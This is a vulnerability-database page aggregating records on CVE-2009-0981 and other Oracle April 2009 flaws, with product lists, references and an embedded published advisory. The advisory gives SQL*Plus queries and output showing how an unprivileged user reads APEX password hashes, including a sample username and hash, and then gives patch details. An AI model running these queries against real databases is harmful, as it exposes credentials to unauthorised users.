Sign-up

ID

VAR-E-200904-0197


CVE

cve_id:CVE-2009-0981

Trust: 2.4

cve_id:CVE-2009-0991

Trust: 0.8

cve_id:CVE-2009-0992

Trust: 0.3

cve_id:CVE-2009-0973

Trust: 0.3

cve_id:CVE-2009-1016

Trust: 0.3

cve_id:CVE-2009-1011

Trust: 0.3

cve_id:CVE-2009-0994

Trust: 0.3

cve_id:CVE-2009-1000

Trust: 0.3

cve_id:CVE-2009-1017

Trust: 0.3

cve_id:CVE-2009-0997

Trust: 0.3

cve_id:CVE-2009-1005

Trust: 0.3

cve_id:CVE-2009-0999

Trust: 0.3

cve_id:CVE-2009-0993

Trust: 0.3

cve_id:CVE-2009-1013

Trust: 0.3

cve_id:CVE-2009-0975

Trust: 0.3

cve_id:CVE-2009-0989

Trust: 0.3

cve_id:CVE-2009-1006

Trust: 0.3

cve_id:CVE-2009-0984

Trust: 0.3

cve_id:CVE-2009-0986

Trust: 0.3

cve_id:CVE-2009-0190

Trust: 0.3

cve_id:CVE-2009-0977

Trust: 0.3

cve_id:CVE-2009-0995

Trust: 0.3

cve_id:CVE-2009-0980

Trust: 0.3

cve_id:CVE-2009-1010

Trust: 0.3

cve_id:CVE-2009-1012

Trust: 0.3

cve_id:CVE-2009-0998

Trust: 0.3

cve_id:CVE-2009-0978

Trust: 0.3

cve_id:CVE-2009-1003

Trust: 0.3

cve_id:CVE-2009-0976

Trust: 0.3

cve_id:CVE-2009-0988

Trust: 0.3

cve_id:CVE-2009-0974

Trust: 0.3

cve_id:CVE-2009-1002

Trust: 0.3

cve_id:CVE-2009-0979

Trust: 0.3

cve_id:CVE-2009-1004

Trust: 0.3

cve_id:CVE-2009-1008

Trust: 0.3

cve_id:CVE-2009-0972

Trust: 0.3

cve_id:CVE-2009-0982

Trust: 0.3

cve_id:CVE-2009-0996

Trust: 0.3

cve_id:CVE-2009-1014

Trust: 0.3

cve_id:CVE-2009-0189

Trust: 0.3

cve_id:CVE-2009-1009

Trust: 0.3

cve_id:CVE-2009-1001

Trust: 0.3

cve_id:CVE-2009-0990

Trust: 0.3

cve_id:CVE-2009-0983

Trust: 0.3

cve_id:CVE-2009-0985

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675

EDB ID

8456


TITLE

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes - Multiple local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 8456

DESCRIPTION

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes. CVE-53738CVE-2009-0981 . local exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 8456

AFFECTED PRODUCTS

vendor:oraclemodel:apexscope:eqversion:3.2

Trust: 1.6

vendor:oraclemodel:oracle11g standard editionscope:eqversion:11.16

Trust: 0.6

vendor:beamodel:systems weblogic serverscope:eqversion:10.3

Trust: 0.6

vendor:beamodel:systems weblogic serverscope:eqversion:10.0

Trust: 0.6

vendor:oraclemodel:rdbms tns listenerscope: - version: -

Trust: 0.5

vendor:apexmodel:password hashscope: - version: -

Trust: 0.5

vendor:oraclemodel:xml publisherscope:eqversion:10.1.3.2.1

Trust: 0.3

vendor:oraclemodel:xml publisherscope:eqversion:5.6.2

Trust: 0.3

vendor:oraclemodel:xml publisherscope:eqversion:10.1.3.2

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:10.3

Trust: 0.3

vendor:oraclemodel:peoplesoft enterprise peopletoolsscope:eqversion:8.49

Trust: 0.3

vendor:oraclemodel:peoplesoft enterprise hrmsscope:eqversion:9.0

Trust: 0.3

vendor:oraclemodel:peoplesoft enterprise hrmsscope:eqversion:8.9

Trust: 0.3

vendor:oraclemodel:outside in sdk html exportscope:eqversion:8.3

Trust: 0.3

vendor:oraclemodel:outside in sdk html exportscope:eqversion:8.2.2

Trust: 0.3

vendor:oraclemodel:oracle9i standard edition .8dvscope:eqversion:9.2

Trust: 0.3

vendor:oraclemodel:oracle9i standard editionscope:eqversion:9.2.8

Trust: 0.3

vendor:oraclemodel:oracle9i personal edition .8dvscope:eqversion:9.2

Trust: 0.3

vendor:oraclemodel:oracle9i personal editionscope:eqversion:9.2.8

Trust: 0.3

vendor:oraclemodel:oracle9i enterprise edition .8dvscope:eqversion:9.2

Trust: 0.3

vendor:oraclemodel:oracle9i enterprise editionscope:eqversion:9.2.8.0

Trust: 0.3

vendor:oraclemodel:oracle11g standard edition onescope:eqversion:11.16

Trust: 0.3

vendor:oraclemodel:oracle11g enterprise editionscope:eqversion:11.16

Trust: 0.3

vendor:oraclemodel:oracle11g enterprise editionscope:eqversion:11.1.0.7

Trust: 0.3

vendor:oraclemodel:oracle10g standard editionscope:eqversion:10.2.3

Trust: 0.3

vendor:oraclemodel:oracle10g standard editionscope:eqversion:10.1.5

Trust: 0.3

vendor:oraclemodel:oracle10g standard editionscope:eqversion:10.2.0.4

Trust: 0.3

vendor:oraclemodel:oracle10g personal editionscope:eqversion:10.2.3

Trust: 0.3

vendor:oraclemodel:oracle10g personal editionscope:eqversion:10.1.5

Trust: 0.3

vendor:oraclemodel:oracle10g personal editionscope:eqversion:10.2.0.4

Trust: 0.3

vendor:oraclemodel:oracle10g enterprise editionscope:eqversion:10.2.3

Trust: 0.3

vendor:oraclemodel:oracle10g enterprise editionscope:eqversion:10.1.5

Trust: 0.3

vendor:oraclemodel:oracle10g enterprise editionscope:eqversion:10.2.0.4

Trust: 0.3

vendor:oraclemodel:oracle10g application serverscope:eqversion:10.1.2

Trust: 0.3

vendor:oraclemodel:oracle10g application serverscope:eqversion:10.1.2.3.0

Trust: 0.3

vendor:oraclemodel:jrockit r27.6.2scope: - version: -

Trust: 0.3

vendor:oraclemodel:jrockit r27.6.0scope: - version: -

Trust: 0.3

vendor:oraclemodel:jrockit r27.1.0scope: - version: -

Trust: 0.3

vendor:oraclemodel:e-business suite 11iscope:eqversion:11.5.10.2

Trust: 0.3

vendor:oraclemodel:e-business suitescope:eqversion:12.0.6

Trust: 0.3

vendor:oraclemodel:data service integratorscope:eqversion:10.3

Trust: 0.3

vendor:oraclemodel:bi publisherscope:eqversion:10.1.3.4

Trust: 0.3

vendor:oraclemodel:bi publisherscope:eqversion:10.1.3.3.3

Trust: 0.3

vendor:oraclemodel:bi publisherscope:eqversion:10.1.3.3.2

Trust: 0.3

vendor:oraclemodel:bi publisherscope:eqversion:10.1.3.3.1

Trust: 0.3

vendor:oraclemodel:bi publisherscope:eqversion:10.1.3.3.0

Trust: 0.3

vendor:oraclemodel:audit vaultscope:eqversion:10.2.3

Trust: 0.3

vendor:oraclemodel:aqualogic data services platformscope:eqversion:3.0.1

Trust: 0.3

vendor:oraclemodel:aqualogic data services platformscope:eqversion:3.2

Trust: 0.3

vendor:oraclemodel:aqualogic data services platformscope:eqversion:3.0

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:8.16

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:8.15

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:8.14

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:8.13

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:8.12

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:8.11

Trust: 0.3

vendor:beamodel:systems weblogic serverscope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.0.0.14

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.0.0.13

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.0.0.12

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.0.0.11

Trust: 0.3

vendor:beamodel:systems weblogic serverscope:eqversion:7.0.0.1

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.07

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.06

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.05

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.04

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.03

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.02

Trust: 0.3

vendor:beamodel:systems weblogic server spscope:eqversion:7.01

Trust: 0.3

vendor:beamodel:systems weblogic serverscope:eqversion:7.0

Trust: 0.3

vendor:beamodel:systems weblogic server maintenance packscope:eqversion:9.2

Trust: 0.3

vendor:beamodel:systems weblogic serverscope:eqversion:9.2

Trust: 0.3

vendor:beamodel:systems weblogic serverscope:eqversion:9.1

Trust: 0.3

vendor:beamodel:systems weblogic serverscope:eqversion:9.0

Trust: 0.3

vendor:beamodel:systems weblogic server sp7scope:eqversion:7.0

Trust: 0.3

vendor:beamodel:systems weblogic server mp1scope:eqversion:10.0

Trust: 0.3

vendor:beamodel:systems weblogic portal sp6scope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic portal sp5scope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic portal sp4scope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic portal sp3scope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic portal sp2scope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic portal sp1scope:eqversion:8.1

Trust: 0.3

vendor:beamodel:systems weblogic portalscope:eqversion:8.1

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675

EXPLOIT

Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]

Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation)
Severity High Risk
Category Password Disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
CVE CVE-2009-0981
Advisory 14 April 2009 (V 1.00)

Details
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
Tested on 11.1.0.7.

C:\> sqlplus dummy/dummy
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
------------------------------
CONNECT

SQL> select owner,table_name from all_tables where owner='FLOWS_030000';

OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE

Get a list of all columns containing the string "%PASSWORD%'

SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';

OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE

9 rows selected.

SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.

Patch Information
Apply the patches for Oracle CPU April 2009.

History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

# milw0rm.com [2009-04-16]

Trust: 1.0

sources: EXPLOIT-DB: 8456

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 8456

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 8456

TYPE

Unprivileged DB users can see APEX Password hashes

Trust: 1.6

sources: EXPLOIT-DB: 8456 // EDBNET: 32675

TAGS

tag:exploit

Trust: 1.0

tag:proof of concept

Trust: 0.5

tag:info disclosure

Trust: 0.5

sources: PACKETSTORM: 76855 // PACKETSTORM: 76731

CREDITS

Alexander Kornbrust

Trust: 0.6

sources: EXPLOIT-DB: 8456

EXTERNAL IDS

db:NVDid:CVE-2009-0981

Trust: 2.4

db:EXPLOIT-DBid:8456

Trust: 1.6

db:NVDid:CVE-2009-0988

Trust: 0.9

db:NVDid:CVE-2009-0991

Trust: 0.8

db:EDBNETid:32675

Trust: 0.6

db:EDBNETid:68211

Trust: 0.6

db:PACKETSTORMid:76855

Trust: 0.5

db:PACKETSTORMid:76731

Trust: 0.5

db:ZDIid:ZDI-09-017

Trust: 0.3

db:NVDid:CVE-2009-0992

Trust: 0.3

db:NVDid:CVE-2009-0973

Trust: 0.3

db:NVDid:CVE-2009-1016

Trust: 0.3

db:NVDid:CVE-2009-1011

Trust: 0.3

db:NVDid:CVE-2009-0994

Trust: 0.3

db:NVDid:CVE-2009-1000

Trust: 0.3

db:NVDid:CVE-2009-1017

Trust: 0.3

db:NVDid:CVE-2009-0997

Trust: 0.3

db:NVDid:CVE-2009-1005

Trust: 0.3

db:NVDid:CVE-2009-0999

Trust: 0.3

db:NVDid:CVE-2009-0993

Trust: 0.3

db:NVDid:CVE-2009-1013

Trust: 0.3

db:NVDid:CVE-2009-0975

Trust: 0.3

db:NVDid:CVE-2009-0989

Trust: 0.3

db:NVDid:CVE-2009-1006

Trust: 0.3

db:NVDid:CVE-2009-0984

Trust: 0.3

db:NVDid:CVE-2009-0986

Trust: 0.3

db:NVDid:CVE-2009-0190

Trust: 0.3

db:NVDid:CVE-2009-0977

Trust: 0.3

db:NVDid:CVE-2009-0995

Trust: 0.3

db:NVDid:CVE-2009-0980

Trust: 0.3

db:NVDid:CVE-2009-1010

Trust: 0.3

db:NVDid:CVE-2009-1012

Trust: 0.3

db:NVDid:CVE-2009-0998

Trust: 0.3

db:NVDid:CVE-2009-0978

Trust: 0.3

db:NVDid:CVE-2009-1003

Trust: 0.3

db:NVDid:CVE-2009-0976

Trust: 0.3

db:NVDid:CVE-2009-0974

Trust: 0.3

db:NVDid:CVE-2009-1002

Trust: 0.3

db:NVDid:CVE-2009-0979

Trust: 0.3

db:NVDid:CVE-2009-1004

Trust: 0.3

db:NVDid:CVE-2009-1008

Trust: 0.3

db:NVDid:CVE-2009-0972

Trust: 0.3

db:NVDid:CVE-2009-0982

Trust: 0.3

db:NVDid:CVE-2009-0996

Trust: 0.3

db:NVDid:CVE-2009-1014

Trust: 0.3

db:NVDid:CVE-2009-0189

Trust: 0.3

db:NVDid:CVE-2009-1009

Trust: 0.3

db:NVDid:CVE-2009-1001

Trust: 0.3

db:NVDid:CVE-2009-0990

Trust: 0.3

db:NVDid:CVE-2009-0983

Trust: 0.3

db:NVDid:CVE-2009-0985

Trust: 0.3

db:BIDid:34461

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675 // EDBNET: 68211

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2009-0981

Trust: 2.1

url:https://www.exploit-db.com/exploits/8456/

Trust: 0.6

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2009-0991

Trust: 0.5

url:http://www.zerodayinitiative.com/advisories/zdi-09-017/

Trust: 0.3

url:http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html

Trust: 0.3

url:http://secunia.com/secunia_research/2009-22/

Trust: 0.3

url:http://secunia.com/secunia_research/2009-23/

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1016.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1012.html

Trust: 0.3

url:http://www.red-database-security.com/advisory/apex_password_hashes.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1004.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1002.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1006.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1003.html

Trust: 0.3

url:http://www.appsecinc.com/resources/alerts/oracle/2009-03.shtml

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1001.html

Trust: 0.3

url:http://www.oracle.com/technology/deploy/security/wls-security/1005.html

Trust: 0.3

url:http://www.oracle.com

Trust: 0.3

url:http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html

Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8456 // EDBNET: 32675 // EDBNET: 68211

SOURCES

db:BIDid:34461
db:PACKETSTORMid:76855
db:PACKETSTORMid:76731
db:EXPLOIT-DBid:8456
db:EDBNETid:32675
db:EDBNETid:68211

LAST UPDATE DATE

2022-07-27T09:19:54.370000+00:00


SOURCES UPDATE DATE

db:BIDid:34461date:2009-09-01T16:22:00

SOURCES RELEASE DATE

db:BIDid:34461date:2009-04-09T00:00:00
db:PACKETSTORMid:76855date:2009-04-21T18:08:37
db:PACKETSTORMid:76731date:2009-04-16T21:55:38
db:EXPLOIT-DBid:8456date:2009-04-16T00:00:00
db:EDBNETid:32675date:2009-04-16T00:00:00
db:EDBNETid:68211date:2009-08-28T00:00:00